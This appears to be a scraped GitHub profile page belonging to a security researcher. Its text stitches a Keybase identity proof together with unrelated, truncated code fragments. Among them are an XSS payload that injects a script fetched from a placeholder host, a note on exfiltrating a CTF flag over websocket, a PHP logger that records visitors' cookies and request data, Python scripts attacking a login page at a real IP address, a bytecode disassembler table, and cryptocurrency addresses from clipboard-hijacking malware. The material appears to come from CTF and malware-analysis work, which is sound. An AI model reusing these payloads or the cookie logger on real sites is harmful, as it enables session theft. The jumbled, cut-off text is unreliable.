Michał Praszmo nazywam

Keybase proof

I hereby claim:

I am nazywam on github.
I am nazywam (https://keybase.io/nazywam) on keybase.
I have a public key ASBS-eg3pHdOd73EyDSSe77zStqyLkQ6Wh4cbDb0_wYMywo

To claim this, I am signing this object:

Application is vulnerable to XSS:

Payload

[{"letter":"x","attributes":{"style":"animation: yellow", "onanimationend":"let script = document.createElement('script'); script.src = '{HOST}/payload.js'; document.head.appendChild(script);"}}]

Exfiltrate the flag using websocket connection

let remote = "certle.ecsc25.hack.cert.pl"

	function loadFrom(xml:String) {
	var map = Xml.parse(xml).elementsNamed("map").next();
	var layers = map.elementsNamed("layer");
	var layer = layers.next();
	var width = Std.parseInt(layer.get("width"));
	var height = Std.parseInt(layer.get("height"));
	mapSize.set(width, height);


	var data = decode(StringTools.trim(layer.elementsNamed("data").next().firstChild().nodeValue));

	import autopy.mouse as mouse
	from PIL import ImageGrab
	from autopy.mouse import LEFT_BUTTON, RIGHT_BUTTON
	import time

	tiles = ["224224224255","255255153255", "2553636255", "0242174255", "44139255255", "221165250255", "552340255", "255211189255", "1590242255", "2551810255", "192192192255", "2062500255"]
	tileMapping = "0123456789ABCDEFGHIJKLMOPQRSTUWXYZ"

	width = 570
	height = 682

	# > < v ^ - zmiana ruchu

	moves = {'<':[-1, 0], '>':[1, 0], '^':[0, -1], 'V':[0, 1]}

	# 1234567890 - push na stos

	numbers = {'0':0, '1':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9}

	# +-*/% - operacje na 2 wartościach na górze stosu

	<?php


	$addr=$_SERVER["REMOTE_ADDR"];
	$data=print_r($_GET, true);
	$browserData=print_r($_SERVER["HTTP_USER_AGENT"], true);
	$cookie=print_r($_COOKIE, true);

	if(!is_dir("data")){
	mkdir("data");

	from requests import Session

	s1 = Session()
	s2 = Session()

	s1.get("http://172.104.131.19/july2017")
	s2.get("http://172.104.131.19/july2017")

	r1 = s1.post("http://172.104.131.19/july2017/3.php?", data={"login":"test", "password":"test"})
	r2 = s2.post("http://172.104.131.19/july2017/3.php?", data={"login":"admin", "password":"admin"})

	import sys
	import requests

	url = "http://172.104.131.19/july2017/1.php"


	def query(payload):
	data = {
	"login":payload,
	"password":"test"

	import sys
	import struct

	instructions = {0x00:("NOP",1),0x01:("PUSHC",3),0x05:("PUSHN",3),0x06:("POPF",3),0x07:("POPM",3),0x08:("POPQF",3),0x09:("PUSHA",3),0x0A:("PUSHF",3),0x0B:("PUSHM",3),0x0C:("PUSHMR",3),0x0D:("PUSHP",3),0x0E:("PUSHQF",3),0x0F:("PUSHV",3),0x10:("SFRAME",3),0x11:("SINIT",3),0x12:("SYMBOL",3),0x13:("SYMF",3),0x19:("BEGIN_SEQ",3),0x1A:("JDBG",3),0x1B:("JF",3),0x1C:("JFPT",3),0x1D:("JISW",3),0x1E:("JMP",3),0x1F:("JNEI",3),0x20:("JT",3),0x21:("JTPF",3),0x23:("PUSHBL",3),0x24:("ARRAYATI",3),0x25:("ARRAYPUTI",3),0x26:("CALL",3),0x27:("DO",3),0x28:("FRAME",3),0x29:("FUNC",3),0x2A:("LINE",3),0x2B:("MAKEA",3),0x2C:("MAKELA",3),0x2D:("PARAMS",3),0x2E:("POPFL",3),0x2F:("POPL",3),0x30:("POPS",3),0x31:("PRIVATES",3),0x33:("PUBLICS",3),0x34:("PUSHFL",3),0x35:("PUSHFLR",3),0x36:("PUSHI",3),0x37:("PUSHL",3),0x38:("PUSHLR",3),0x39:("PUSHS",3),0x3A:("PUSHSR",3),0x3B:("PUSHW",3),0x3C:("SEND",3),0x3D:("XBLOCK",3),0x4A:("MPOPF",5),0x4B:("MPOPM",5),0x4C:("MPOPQF",5),0x4D:("MPUSHA",5),0x4E:("MPUSHF",5),0x4F:("M

	sample: ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826 -> afaebc6cf20f32ea0644f69c511a5da12f3b860f7d13b18500051830337965d7

	clipboard sub:

	* bc1: `bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v`
	* ltc1: `LQ4B4aJqUH92BgtDseWxiCRn45Q8eHzTkH`
	* 0x: `0x10A8B2e2790879FFCdE514DdE615b4732312252D`
	* D: `DQzrwvUJTXBxAbYiynzACLntrY4i9mMs7D`
	* T: `TW93HYbyptRYsXj1rkHWyVUpps2anK12hg`
	* r: `r9vQFVwRxSkpFavwA9HefPFkWaWBQxy4pU`